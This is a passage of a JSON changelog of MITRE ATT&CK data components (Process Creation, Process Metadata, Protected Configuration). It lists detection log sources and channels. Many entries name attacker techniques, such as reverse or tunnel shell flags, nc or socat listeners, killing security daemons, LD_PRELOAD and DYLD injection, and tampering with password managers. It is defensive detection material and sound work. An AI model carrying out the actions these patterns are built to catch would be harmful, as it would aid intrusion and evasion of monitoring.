                            "channel": "Execution of system_profiler or osascript invoking enumeration"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "apache2 or nginx spawning sh, bash, or python interpreter"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "httpd spawning bash, zsh, python, or osascript"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/libexec/security_authtrampoline or child processes originating from non-trusted binaries triggering credential prompts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security or osascript"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd spawning processes tied to new or modified LaunchDaemon .plist entries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of ping, nping, or crafted network packets via bash or python to reflection services"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of commands modifying iptables/nftables to block selective IPs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "System process modifications altering DNS/proxy settings"
                        },
                        {
                            "name": "containerd:Events",
                            "channel": "unusual process spawned from container image context"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "curl, python scripts, rsync with internal share URLs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: spawn, exec"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Rapid spawning of resource-heavy applications (e.g., Preview, Safari, Office)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation events where command line = pmset with arguments affecting sleep, hibernatemode, displaysleep"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected apps performing repeated DNS lookups"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchservices or loginwindow events"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with LD_PRELOAD or linker-related environment variables set"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of process with DYLD_INSERT_LIBRARIES set"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious Swift/Objective-C or scripting processes writing archive-like outputs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of re-parented process"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Anomalous parent PID change"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation with parent PID of 1 (launchd)"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "child process invoking dynamic linker post-ptrace"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Processes executing kextload, spctl, or modifying kernel extension directories"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Unsigned or ad-hoc signed process executions in user contexts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of diskutil or hdiutil attaching hidden partitions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for discovery utilities (system_profiler, sw_vers, dscl, networksetup) with command-line parameter analysis"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process event monitoring with focus on discovery utilities and cryptographic framework usage correlation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected apps generating frequent DNS queries"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process exec"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket: Suspicious creation of AF_UNIX sockets outside expected daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Non-standard processes invoking financial applications or payment APIs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Agent/headless flags (listen/connect/reverse/tunnel) or remote-control binaries spawning shells"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "systemctl enable/start: Creation/enablement of custom .service units in /etc/systemd/system"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process exec of remote-control apps or binaries with headless/connect flags"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process activity, exec events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream process subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process:exec and kext load events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --info --predicate 'eventMessage CONTAINS \"exec\"'"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-DotNETRuntime",
                            "channel": "Unexpected AppDomain creation events or anomalous AppDomainManager assembly load behavior"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of network stress tools or anomalies in socket/syscall behavior"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unsigned binary execution following SIP change"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands altering firewall or enabling listeners (iptables, nft, ufw, firewall-cmd, systemctl start *ssh*/*telnet*, ip route add, tcpdump, tshark)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of /sbin/pfctl, /usr/libexec/ApplicationFirewall/socketfilterfw, ifconfig, tcpdump, npcap/libpcap consumers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of zip, ditto, hdiutil, or openssl by non-terminal parent processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of binaries with TCC protected access under unexpected parent processes such as Finder.app, SystemUIServer, or nsurlsessiond"
                        },
                        {
                            "name": "WinEventLog:AppLocker",
                            "channel": "EventCode=8003, 8004"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, unlink"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd, processes"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "socat, ssh, or nc processes opening unexpected ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution of ssh with -L/-R forwarding flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchd or cron spawning mining binaries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve or socket/connect system calls for processes using RSA handshake"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process invoking SecKeyCreateRandomKey or asymmetric crypto APIs"
                        },
                        {
                            "name": "azure:vmguest",
                            "channel": "Unexpected execution of cloud agent processes (e.g., WindowsAzureGuestAgent.exe, ssm-agent) followed by arbitrary script or binary execution"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Script interpreter invoked by nginx/apache worker process"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of Office binaries with network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch of bash/zsh/python/osascript targeting key file locations"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of /sbin/emond with child processes launched"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "provider: ETW CreateProcess events linking msbuild.exe to suspicious children where standard logs are incomplete"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "shutdown -h now or reboot"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of Code.app, idea, JetBrainsToolbox, eclipse with install/extension flags"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events for system discovery utilities (system_profiler, sysctl, networksetup, ioreg) with parameter analysis"
                        },
                        {
                            "name": "OpenBSM:AuditTrail",
                            "channel": "BSM audit events for process execution and system call monitoring during reconnaissance"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "host daemon events related to VM operations and configuration queries during reconnaissance"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMware kernel events for hardware and system configuration access during environmental validation"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "processes modifying environment variables related to history logging"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: parent process is usb/hid device handler, child process bash/python invoked"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of curl, rclone, or Office apps invoking network sessions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec: Execution of kextstat, kextfind, or ioreg targeting driver information"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process creation involving binaries interacting with resource fork data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process event"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of suspicious exploit binaries targeting security daemons"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execve: Unsigned or unnotarized processes launched with high privileges"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "security OR injection attempts into 1Password OR LastPass"
                        },
                        {
                            "name": "AndroidLogs:Kernel",
                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
                        },
                        {
                            "name": "AndroidLogs:Framework",
                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application installed from adb, sideload, or unknown USB source"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_data_source_ref']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 15:49:16.424000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0032\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0032\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][320]\": {\"name\": \"AndroidLogs:Kernel\", \"channel\": \"init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot\"}, \"root['x_mitre_log_sources'][321]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock\"}, \"root['x_mitre_log_sources'][322]\": {\"name\": \"AndroidLogs:Framework\", \"channel\": \"Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox\"}, \"root['x_mitre_log_sources'][323]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process\"}, \"root['x_mitre_log_sources'][324]\": {\"name\": \"android:logcat\", \"channel\": \"dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process\"}, \"root['x_mitre_log_sources'][325]\": {\"name\": \"android:logcat\", \"channel\": \"startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus\"}, \"root['x_mitre_log_sources'][326]\": {\"name\": \"android:logcat\", \"channel\": \"unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID\"}, \"root['x_mitre_log_sources'][327]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes audio buffer or recorded audio file into application storage directories\"}, \"root['x_mitre_log_sources'][328]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior\"}, \"root['x_mitre_log_sources'][329]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application installed from adb, sideload, or unknown USB source\"}, \"root['x_mitre_log_sources'][330]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation\"}, \"root['x_mitre_log_sources'][331]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor\"}, \"root['x_mitre_log_sources'][332]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-16 17:01:33.771000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0034",
                            "external_id": "DC0034"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Metadata",
                    "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.process"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "CodeIntegrity/WDAC events indicating unsigned/invalid DLL loads"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo or service accounts invoking loaders with suspicious env vars"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Process Context"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "user session"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Admin activity"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call for sudo where euid != uid"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.TCC"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec of binary with setuid/setgid and EUID != UID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Use of fork/exec with DISPLAY unset or redirected"
                        },
                        {
                            "name": "EDR:Telemetry",
                            "channel": "Process lineage and API usage enrichment (GetSystemTime, GetTimeZoneInformation, NtQuerySystemTime)"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log API calls reading/altering time/ntp settings"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, prctl, or ptrace activity affecting process memory or command-line arguments"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Cross-reference argv[0] with actual executable path and parent process metadata"
                        },
                        {
                            "name": "WinEventLog:AppLocker",
                            "channel": "AppLocker audit/blocks showing developer utilities executing scripts/binaries outside policy"
                        },
                        {
                            "name": "EDR:hunting",
                            "channel": "Correlation of signer info, parent-child lineage, rare invocation context (user host role), and API surfaces (CreateProcess*, LoadLibrary*)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Security-Mitigations/KernelMode",
                            "channel": "ETW telemetry indicating ClickOnce deployment (dfsvc.exe) launching payloads"
                        },
                        {
                            "name": "etw:Microsoft-Windows-ClickOnce",
                            "channel": "provider: Event Tracing for Windows (ETW) events associated with ClickOnce deployment (dfsvc.exe activity)"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Camera Frame Server/Operational",
                            "channel": "Process session start/stop events for camera pipeline by unexpected executables"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "select: path LIKE '/dev/video%'"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "state=attached/debugged"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Code Execution & Entitlement Access"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process opening SSH_AUTH_SOCK or /tmp/ssh-* socket not owned by same UID"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "code signature/memory protection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with UID \u2260 EUID"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve with escalated privileges"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "cross-account or unexpected assume role"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log collect from launchd and process start"
                        },
                        {
                            "name": "containerd:events",
                            "channel": "Docker or containerd image pulls and process executions"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Kernel or daemon warnings of downgraded TLS or cryptographic settings"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modifications or writes to EFI system partition for downgraded bootloaders"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "non-shell process tree accessing bash history"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process metadata mismatch between /proc and runtime attributes"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process environment variables containing LD_PRELOAD"
                        },
                        {
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=400, 403"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Process Execution + Hash"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-Process",
                            "channel": "process_start: EventHeader.ProcessId true parent vs reported PPID mismatch"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_MMAP"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned/invalid signature modules or images loaded by msbuild.exe or its children"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-DeviceGuard/Operational",
                            "channel": "WDAC policy audit/block affecting msbuild.exe spawned payloads"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-SmartAppControl/Operational",
                            "channel": "Smart App Control decisions (audit/block) for msbuild.exe-launched executables"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
                            "channel": "Unsigned or untrusted modules loaded during JamPlus.exe runtime"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Crash or abnormal termination of security agent or system extension host"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 17:01:33.771000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][44]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Crash or abnormal termination of security agent or system extension host\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-13 20:00:38.029000+00:00",
                    "modified": "2026-03-13 23:45:27.570000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0115",
                            "external_id": "DC0115"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Protected Configuration",
                    "description": "Protected Configuration represents security-sensitive device settings, security policies, or operating system configurations that are normally restricted to administrators, system services, or device management platforms.\nMonitoring these configurations enables detection of adversaries attempting to weaken device security controls or alter trusted device relationships.\n\nExamples\nAndroid:\n\n- USB debugging enabled\n- Unknown app installation allowed\n- Developer options enabled\n\niOS:\n\n- Developer mode enabled\n- Device pairing trust relationships established\n- Configuration profile restrictions modified\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Application Vetting",
                            "channel": "None"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Developer Mode enabled, supervised-device restriction changed, or trust-related protected device posture changed"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Biometric, credential, lockscreen, trust-agent, Smart Lock, or device-admin-related protected device configuration changed"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Passcode, biometrics, attention-aware authentication, or supervised-device lock policy changed in a way that weakens or alters the authentication boundary"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed Wi-Fi, VPN, cellular, or location-related policy state remains unchanged while network capability degrades"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Managed Wi-Fi, VPN, cellular, or location-service policy remains unchanged while device connectivity repeatedly degrades"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed storage, backup, enterprise file access, or device policy state remains unchanged while bulk destructive file transformation occurs"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app catalog, enterprise update policy, or trusted distribution posture remains unchanged while a known app exhibits materially different post-update behavior"
                        },
                        {
                            "name": "iOS:MDMLog",
                            "channel": "Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change"
                        },
                        {
                            "name": "android:MDMLog",
                            "channel": "Managed app distribution, enterprise catalog trust, and update policy remain expected while a known package exhibits materially different post-install or post-update behavior"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 23:45:27.570000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0115\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0115\"}, \"root['description']\": {\"new_value\": \"Protected Configuration represents security-sensitive device settings, security policies, or operating system configurations that are normally restricted to administrators, system services, or device management platforms.\\nMonitoring these configurations enables detection of adversaries attempting to weaken device security controls or alter trusted device relationships.\\n\\nExamples\\nAndroid:\\n\\n- USB debugging enabled\\n- Unknown app installation allowed\\n- Developer options enabled\\n\\niOS:\\n\\n- Developer mode enabled\\n- Device pairing trust relationships established\\n- Configuration profile restrictions modified\\n\", \"old_value\": \"Device configuration options that are not typically utilized by benign applications\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,15 @@\\n-Device configuration options that are not typically utilized by benign applications\\n+Protected Configuration represents security-sensitive device settings, security policies, or operating system configurations that are normally restricted to administrators, system services, or device management platforms.\\n+Monitoring these configurations enables detection of adversaries attempting to weaken device security controls or alter trusted device relationships.\\n+\\n+Examples\\n+Android:\\n+\\n+- USB debugging enabled\\n+- Unknown app installation allowed\\n+- Developer options enabled\\n+\\n+iOS:\\n+\\n+- Developer mode enabled\\n+- Device pairing trust relationships established\\n+- Configuration profile restrictions modified\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][1]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Developer Mode enabled, supervised-device restriction changed, or trust-related protected device posture changed\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"android:MDMLog\", \"channel\": \"Biometric, credential, lockscreen, trust-agent, Smart Lock, or device-admin-related protected device configuration changed\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Passcode, biometrics, attention-aware authentication, or supervised-device lock policy changed in a way that weakens or alters the authentication boundary\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed Wi-Fi, VPN, cellular, or location-related policy state remains unchanged while network capability degrades\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Managed Wi-Fi, VPN, cellular, or location-service policy remains unchanged while device connectivity repeatedly degrades\"}, \"root['x_mitre_log_sources'][6]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed storage, backup, enterprise file access, or device policy state remains unchanged while bulk destructive file transformation occurs\"}, \"root['x_mitre_log_sources'][7]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app catalog, enterprise update policy, or trusted distribution posture remains unchanged while a known app exhibits materially different post-update behavior\"}, \"root['x_mitre_log_sources'][8]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change\"}, \"root['x_mitre_log_sources'][9]\": {\"name\": \"android:MDMLog\", \"channel\": \"Managed app distribution, enterprise catalog trust, and update policy remain expected while a known package exhibits materially different post-install or post-update behavior\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to69__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to69__0\"><a href=\"#difflib_chg_to69__top\">t</a></td><td class=\"diff_header\" id=\"from69_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Device&nbsp;configuration&nbsp;options&nbsp;that&nbsp;are&nbsp;not&nbsp;typically&nbsp;utilized</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to69__top\">t</a></td><td class=\"diff_header\" id=\"to69_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Protected&nbsp;Configuration&nbsp;represents&nbsp;security-sensitive&nbsp;device</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;by&nbsp;benign&nbsp;applications</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;settings,&nbsp;security&nbsp;policies,&nbsp;or&nbsp;operating&nbsp;system&nbsp;configurat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ions&nbsp;that&nbsp;are&nbsp;normally&nbsp;restricted&nbsp;to&nbsp;administrators,&nbsp;system&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">services,&nbsp;or&nbsp;device&nbsp;management&nbsp;platforms.&nbsp;Monitoring&nbsp;these&nbsp;c</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">onfigurations&nbsp;enables&nbsp;detection&nbsp;of&nbsp;adversaries&nbsp;attempting&nbsp;to</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 